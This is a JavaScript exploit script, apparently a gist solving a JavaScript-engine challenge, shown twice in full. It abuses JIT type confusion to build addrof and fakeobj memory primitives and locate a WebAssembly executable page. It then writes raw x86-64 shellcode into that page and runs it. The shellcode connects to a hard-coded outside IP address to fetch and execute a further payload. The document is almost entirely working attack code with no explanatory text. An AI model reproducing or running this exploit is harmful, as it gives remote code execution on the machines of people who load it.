YiChenChai/omnitizer-exploit.js Secret

## omnitizer-exploit.js
function r(i) {
	i[0];
	i[1];
	i[2];
	i[3];
	return i[0];
}
function w(i, v) {
	i[0];
	i[1];
	i[2];
	i[3];
	i[0] = v;
}
function dr(i) {
	i.a;
	i.b;
	i.c;
	i.d;
	return i.b;
}
for (var j = 0; j < 1000000; j++) {r([1.1,1.1,1.1,1.1,1.1]);}
for (var j = 0; j < 1000000; j++) {w([1.1,1.1,1.1,1.1,1.1], 2.2);}
for (var j = 0; j < 1000000; j++) {dr({a: 1.1, b: 1.1, c: 1.1, d: 1.1});}


function f2h(f, off) {
	var buf = new DataView(new ArrayBuffer(8));
	buf.setFloat64(0, f);
	return buf.getUint32(off);
}

function h2f(h, l) {
	var buf = new DataView(new ArrayBuffer(8));
	buf.setUint32(4, h);
	buf.setUint32(0, l);
	return buf.getFloat64(0);
}

function addrof(obj) {
	var raw = r([obj, [], [], [], []]);
	//console.log(raw);
	return f2h(raw, 4);
}
function fakeobj(addr) {
	var store = [[], [], [], [], []];
	var raw = w(store, h2f(addr, 0));
	return store[0];
}
function deref(obj, off) {
	var raw = dr({a: 1.1, b: obj});
	return f2h(raw, off);
}
function nextpart(f) {
	var rwxloc = addrof(m) + 0x68;
	// %DebugPrint(m);
	sub = 0;
	if ((rwxloc - loc) % 8 != 0) {sub = 4;}
	var rwxidx = (rwxloc - loc - sub) / 8;
	var var1 = f[rwxidx];
	var var2 = f[rwxidx + 1];
	var res = var1;
	console.log(rwxidx);
	if (sub != 0) {
		resl = f2h(var1, 0);
		resh = f2h(var2, 4);
		res = h2f(resl, resh);
		console.log("special");
		console.log(resl.toString(16));
		console.log(resh.toString(16));
		console.log(res);
	}
	return [res, addrof(m.exports.main)];
}
var wasmCode = new Uint8Array([0x0,0x61,0x73,0x6d,0x1,0x0,0x0,0x0,0x1,0x85,0x80,0x80,0x80,0x0,0x1,0x60,0x0,0x1,0x7f,0x3,0x83,0x80,0x80,0x80,0x0,0x2,0x0,0x0,0x4,0x84,0x80,0x80,0x80,0x0,0x1,0x70,0x0,0x0,0x5,0x83,0x80,0x80,0x80,0x0,0x1,0x0,0x1,0x6,0x81,0x80,0x80,0x80,0x0,0x0,0x7,0x9d,0x80,0x80,0x80,0x0,0x3,0x6,0x6d,0x65,0x6d,0x6f,0x72,0x79,0x2,0x0,0x9,0x5f,0x5a,0x35,0x68,0x61,0x70,0x70,0x79,0x76,0x0,0x0,0x4,0x6d,0x61,0x69,0x6e,0x0,0x1,0xa,0x93,0x80,0x80,0x80,0x0,0x2,0x84,0x80,0x80,0x80,0x0,0x0,0x41,0x2b,0xb,0x84,0x80,0x80,0x80,0x0,0x0,0x41,0x2a,0xb]);
var wasmMod = new WebAssembly.Module(wasmCode);
var m = new WebAssembly.Instance(wasmMod);
console.log(m);
console.log(fakearr_data);
var fakearr_data = [h2f(0x08241909, 0x080406e9), 0.1, 0.2];
var loc = deref(fakearr_data, 0)
console.log(loc.toString(16));
fakearr_data[1] = h2f(loc + 0x18, 0x80000);
fakearr_data[2] = h2f(0x08040a3d, 0x80000);

var fakearr = fakeobj(deref(fakearr_data, 0) + 8);
loc += 0x20;
var arrbuf = new ArrayBuffer(0x1000);
var dv = new DataView(arrbuf);
var arrbuf_loc = addrof(arrbuf);


console.log(arrbuf_loc);
console.log(loc);


var beginidx = (arrbuf_loc + 0x20 - loc - 8 -4) / 8;
var backing = fakearr[beginidx];

console.log(fakearr[beginidx]);

var res = nextpart(fakearr);
var rwxpage = res[0];
var fff = fakeobj(res[1]);
console.log(rwxpage);
// %DebugPrint(arrbuf);
var shellcode = [	 0xfc,  0x48,  0x83,  0xe4,  0xf0,  0xe8,  0xcc,  0x00,	 0x00,  0x00,  0x41,  0x51,  0x41,  0x50,  0x52,  0x51,	 0x56,  0x48,  0x31,  0xd2,  0x65,  0x48,  0x8b,  0x52,	 0x60,  0x48,  0x8b,  0x52,  0x18,  0x48,  0x8b,  0x52,	 0x20,  0x48,  0x8b,  0x72,  0x50,  0x48,  0x0f,  0xb7,	 0x4a,  0x4a,  0x4d,  0x31,  0xc9,  0x48,  0x31,  0xc0,	 0xac,  0x3c,  0x61,  0x7c,  0x02,  0x2c,  0x20,  0x41,	 0xc1,  0xc9,  0x0d,  0x41,  0x01,  0xc1,  0xe2,  0xed,	 0x52,  0x41,  0x51,  0x48,  0x8b,  0x52,  0x20,  0x8b,	 0x42,  0x3c,  0x48,  0x01,  0xd0,  0x66,  0x81,  0x78,	 0x18,  0x0b,  0x02,  0x0f,  0x85,  0x72,  0x00,  0x00,	 0x00,  0x8b,  0x80,  0x88,  0x00,  0x00,  0x00,  0x48,	 0x85,  0xc0,  0x74,  0x67,  0x48,  0x01,  0xd0,  0x50,	 0x8b,  0x48,  0x18,  0x44,  0x8b,  0x40,  0x20,  0x49,	 0x01,  0xd0,  0xe3,  0x56,  0x48,  0xff,  0xc9,  0x41,	 0x8b,  0x34,  0x88,  0x48,  0x01,  0xd6,  0x4d,  0x31,	 0xc9,  0x48,  0x31,  0xc0,  0xac,  0x41,  0xc1,  0xc9,	 0x0d,  0x41,  0x01,  0xc1,  0x38,  0xe0,  0x75,  0xf1,	 0x4c,  0x03,  0x4c,  0x24,  0x08,  0x45,  0x39,  0xd1,	 0x75,  0xd8,  0x58,  0x44,  0x8b,  0x40,  0x24,  0x49,	 0x01,  0xd0,  0x66,  0x41,  0x8b,  0x0c,  0x48,  0x44,	 0x8b,  0x40,  0x1c,  0x49,  0x01,  0xd0,  0x41,  0x8b,	 0x04,  0x88,  0x48,  0x01,  0xd0,  0x41,  0x58,  0x41,	 0x58,  0x5e,  0x59,  0x5a,  0x41,  0x58,  0x41,  0x59,	 0x41,  0x5a,  0x48,  0x83,  0xec,  0x20,  0x41,  0x52,	 0xff,  0xe0,  0x58,  0x41,  0x59,  0x5a,  0x48,  0x8b,	 0x12,  0xe9,  0x4b,  0xff,  0xff,  0xff,  0x5d,  0x49,	 0xbe,  0x77,  0x73,  0x32,  0x5f,  0x33,  0x32,  0x00,	 0x00,  0x41,  0x56,  0x49,  0x89,  0xe6,  0x48,  0x81,	 0xec,  0xa0,  0x01,  0x00,  0x00,  0x49,  0x89,  0xe5,	 0x49,  0xbc,  0x02,  0x00,  0x11,  0x52,  0x80,  0xc7,	 0xd1,  0x0e,  0x41,  0x54,  0x49,  0x89,  0xe4,  0x4c,	 0x89,  0xf1,  0x41,  0xba,  0x4c,  0x77,  0x26,  0x07,	 0xff,  0xd5,  0x4c,  0x89,  0xea,  0x68,  0x01,  0x01,	 0x00,  0x00,  0x59,  0x41,  0xba,  0x29,  0x80,  0x6b,	 0x00,  0xff,  0xd5,  0x6a,  0x0a,  0x41,  0x5e,  0x50,	 0x50,  0x4d,  0x31,  0xc9,  0x4d,  0x31,  0xc0,  0x48,	 0xff,  0xc0,  0x48,  0x89,  0xc2,  0x48,  0xff,  0xc0,	 0x48,  0x89,  0xc1,  0x41,  0xba,  0xea,  0x0f,  0xdf,	 0xe0,  0xff,  0xd5,  0x48,  0x89,  0xc7,  0x6a,  0x10,	 0x41,  0x58,  0x4c,  0x89,  0xe2,  0x48,  0x89,  0xf9,	 0x41,  0xba,  0x99,  0xa5,  0x74,  0x61,  0xff,  0xd5,	 0x85,  0xc0,  0x74,  0x0a,  0x49,  0xff,  0xce,  0x75,	 0xe5,  0xe8,  0x93,  0x00,  0x00,  0x00,  0x48,  0x83,	 0xec,  0x10,  0x48,  0x89,  0xe2,  0x4d,  0x31,  0xc9,	 0x6a,  0x04,  0x41,  0x58,  0x48,  0x89,  0xf9,  0x41,	 0xba,  0x02,  0xd9,  0xc8,  0x5f,  0xff,  0xd5,  0x83,	 0xf8,  0x00,  0x7e,  0x55,  0x48,  0x83,  0xc4,  0x20,	 0x5e,  0x89,  0xf6,  0x6a,  0x40,  0x41,  0x59,  0x68,	 0x00,  0x10,  0x00,  0x00,  0x41,  0x58,  0x48,  0x89,	 0xf2,  0x48,  0x31,  0xc9,  0x41,  0xba,  0x58,  0xa4,	 0x53,  0xe5,  0xff,  0xd5,  0x48,  0x89,  0xc3,  0x49,	 0x89,  0xc7,  0x4d,  0x31,  0xc9,  0x49,  0x89,  0xf0,	 0x48,  0x89,  0xda,  0x48,  0x89,  0xf9,  0x41,  0xba,	 0x02,  0xd9,  0xc8,  0x5f,  0xff,  0xd5,  0x83,  0xf8,	 0x00,  0x7d,  0x28,  0x58,  0x41,  0x57,  0x59,  0x68,	 0x00,  0x40,  0x00,  0x00,  0x41,  0x58,  0x6a,  0x00,	 0x5a,  0x41,  0xba,  0x0b,  0x2f,  0x0f,  0x30,  0xff,	 0xd5,  0x57,  0x59,  0x41,  0xba,  0x75,  0x6e,  0x4d,	 0x61,  0xff,  0xd5,  0x49,  0xff,  0xce,  0xe9,  0x3c,	 0xff,  0xff,  0xff,  0x48,  0x01,  0xc3,  0x48,  0x29,	 0xc6,  0x48,  0x85,  0xf6,  0x75,  0xb4,  0x41,  0xff,	 0xe7,  0x58,  0x6a,  0x00,  0x59,  0x49,  0xc7,  0xc2,	 0xf0,  0xb5,  0xa2,  0x56,  0xff,  0xd5];
fakearr[beginidx] = rwxpage;
console.log(dv.getUint32(0).toString(16));
for (var i = 0; i < shellcode.length; i++) {
	dv.setUint8(i, shellcode[i]);
}
// readline();;
fff();
	function r(i) {
	i[0];
	i[1];
	i[2];
	i[3];
	return i[0];
	}
	function w(i, v) {
	i[0];
	i[1];
	i[2];
	i[3];
	i[0] = v;
	}
	function dr(i) {
	i.a;
	i.b;
	i.c;
	i.d;
	return i.b;
	}
	for (var j = 0; j < 1000000; j++) {r([1.1,1.1,1.1,1.1,1.1]);}
	for (var j = 0; j < 1000000; j++) {w([1.1,1.1,1.1,1.1,1.1], 2.2);}
	for (var j = 0; j < 1000000; j++) {dr({a: 1.1, b: 1.1, c: 1.1, d: 1.1});}


	function f2h(f, off) {
	var buf = new DataView(new ArrayBuffer(8));
	buf.setFloat64(0, f);
	return buf.getUint32(off);
	}

	function h2f(h, l) {
	var buf = new DataView(new ArrayBuffer(8));
	buf.setUint32(4, h);
	buf.setUint32(0, l);
	return buf.getFloat64(0);
	}

	function addrof(obj) {
	var raw = r([obj, [], [], [], []]);
	//console.log(raw);
	return f2h(raw, 4);
	}
	function fakeobj(addr) {
	var store = [[], [], [], [], []];
	var raw = w(store, h2f(addr, 0));
	return store[0];
	}
	function deref(obj, off) {
	var raw = dr({a: 1.1, b: obj});
	return f2h(raw, off);
	}
	function nextpart(f) {
	var rwxloc = addrof(m) + 0x68;
	// %DebugPrint(m);
	sub = 0;
	if ((rwxloc - loc) % 8 != 0) {sub = 4;}
	var rwxidx = (rwxloc - loc - sub) / 8;
	var var1 = f[rwxidx];
	var var2 = f[rwxidx + 1];
	var res = var1;
	console.log(rwxidx);
	if (sub != 0) {
	resl = f2h(var1, 0);
	resh = f2h(var2, 4);
	res = h2f(resl, resh);
	console.log("special");
	console.log(resl.toString(16));
	console.log(resh.toString(16));
	console.log(res);
	}
	return [res, addrof(m.exports.main)];
	}
	var wasmCode = new Uint8Array([0x0,0x61,0x73,0x6d,0x1,0x0,0x0,0x0,0x1,0x85,0x80,0x80,0x80,0x0,0x1,0x60,0x0,0x1,0x7f,0x3,0x83,0x80,0x80,0x80,0x0,0x2,0x0,0x0,0x4,0x84,0x80,0x80,0x80,0x0,0x1,0x70,0x0,0x0,0x5,0x83,0x80,0x80,0x80,0x0,0x1,0x0,0x1,0x6,0x81,0x80,0x80,0x80,0x0,0x0,0x7,0x9d,0x80,0x80,0x80,0x0,0x3,0x6,0x6d,0x65,0x6d,0x6f,0x72,0x79,0x2,0x0,0x9,0x5f,0x5a,0x35,0x68,0x61,0x70,0x70,0x79,0x76,0x0,0x0,0x4,0x6d,0x61,0x69,0x6e,0x0,0x1,0xa,0x93,0x80,0x80,0x80,0x0,0x2,0x84,0x80,0x80,0x80,0x0,0x0,0x41,0x2b,0xb,0x84,0x80,0x80,0x80,0x0,0x0,0x41,0x2a,0xb]);
	var wasmMod = new WebAssembly.Module(wasmCode);
	var m = new WebAssembly.Instance(wasmMod);
	console.log(m);
	console.log(fakearr_data);
	var fakearr_data = [h2f(0x08241909, 0x080406e9), 0.1, 0.2];
	var loc = deref(fakearr_data, 0)
	console.log(loc.toString(16));
	fakearr_data[1] = h2f(loc + 0x18, 0x80000);
	fakearr_data[2] = h2f(0x08040a3d, 0x80000);

	var fakearr = fakeobj(deref(fakearr_data, 0) + 8);
	loc += 0x20;
	var arrbuf = new ArrayBuffer(0x1000);
	var dv = new DataView(arrbuf);
	var arrbuf_loc = addrof(arrbuf);



	console.log(arrbuf_loc);
	console.log(loc);


	var beginidx = (arrbuf_loc + 0x20 - loc - 8 -4) / 8;
	var backing = fakearr[beginidx];

	console.log(fakearr[beginidx]);

	var res = nextpart(fakearr);
	var rwxpage = res[0];
	var fff = fakeobj(res[1]);
	console.log(rwxpage);
	// %DebugPrint(arrbuf);
	var shellcode = [ 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xcc, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x66, 0x81, 0x78, 0x18, 0x0b, 0x02, 0x0f, 0x85, 0x72, 0x00, 0x00, 0x00, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x4b, 0xff, 0xff, 0xff, 0x5d, 0x49, 0xbe, 0x77, 0x73, 0x32, 0x5f, 0x33, 0x32, 0x00, 0x00, 0x41, 0x56, 0x49, 0x89, 0xe6, 0x48, 0x81, 0xec, 0xa0, 0x01, 0x00, 0x00, 0x49, 0x89, 0xe5, 0x49, 0xbc, 0x02, 0x00, 0x11, 0x52, 0x80, 0xc7, 0xd1, 0x0e, 0x41, 0x54, 0x49, 0x89, 0xe4, 0x4c, 0x89, 0xf1, 0x41, 0xba, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x4c, 0x89, 0xea, 0x68, 0x01, 0x01, 0x00, 0x00, 0x59, 0x41, 0xba, 0x29, 0x80, 0x6b, 0x00, 0xff, 0xd5, 0x6a, 0x0a, 0x41, 0x5e, 0x50, 0x50, 0x4d, 0x31, 0xc9, 0x4d, 0x31, 0xc0, 0x48, 0xff, 0xc0, 0x48, 0x89, 0xc2, 0x48, 0xff, 0xc0, 0x48, 0x89, 0xc1, 0x41, 0xba, 0xea, 0x0f, 0xdf, 0xe0, 0xff, 0xd5, 0x48, 0x89, 0xc7, 0x6a, 0x10, 0x41, 0x58, 0x4c, 0x89, 0xe2, 0x48, 0x89, 0xf9, 0x41, 0xba, 0x99, 0xa5, 0x74, 0x61, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0x0a, 0x49, 0xff, 0xce, 0x75, 0xe5, 0xe8, 0x93, 0x00, 0x00, 0x00, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0xe2, 0x4d, 0x31, 0xc9, 0x6a, 0x04, 0x41, 0x58, 0x48, 0x89, 0xf9, 0x41, 0xba, 0x02, 0xd9, 0xc8, 0x5f, 0xff, 0xd5, 0x83, 0xf8, 0x00, 0x7e, 0x55, 0x48, 0x83, 0xc4, 0x20, 0x5e, 0x89, 0xf6, 0x6a, 0x40, 0x41, 0x59, 0x68, 0x00, 0x10, 0x00, 0x00, 0x41, 0x58, 0x48, 0x89, 0xf2, 0x48, 0x31, 0xc9, 0x41, 0xba, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x48, 0x89, 0xc3, 0x49, 0x89, 0xc7, 0x4d, 0x31, 0xc9, 0x49, 0x89, 0xf0, 0x48, 0x89, 0xda, 0x48, 0x89, 0xf9, 0x41, 0xba, 0x02, 0xd9, 0xc8, 0x5f, 0xff, 0xd5, 0x83, 0xf8, 0x00, 0x7d, 0x28, 0x58, 0x41, 0x57, 0x59, 0x68, 0x00, 0x40, 0x00, 0x00, 0x41, 0x58, 0x6a, 0x00, 0x5a, 0x41, 0xba, 0x0b, 0x2f, 0x0f, 0x30, 0xff, 0xd5, 0x57, 0x59, 0x41, 0xba, 0x75, 0x6e, 0x4d, 0x61, 0xff, 0xd5, 0x49, 0xff, 0xce, 0xe9, 0x3c, 0xff, 0xff, 0xff, 0x48, 0x01, 0xc3, 0x48, 0x29, 0xc6, 0x48, 0x85, 0xf6, 0x75, 0xb4, 0x41, 0xff, 0xe7, 0x58, 0x6a, 0x00, 0x59, 0x49, 0xc7, 0xc2, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5];
	fakearr[beginidx] = rwxpage;
	console.log(dv.getUint32(0).toString(16));
	for (var i = 0; i < shellcode.length; i++) {
	dv.setUint8(i, shellcode[i]);
	}
	// readline();;
	fff();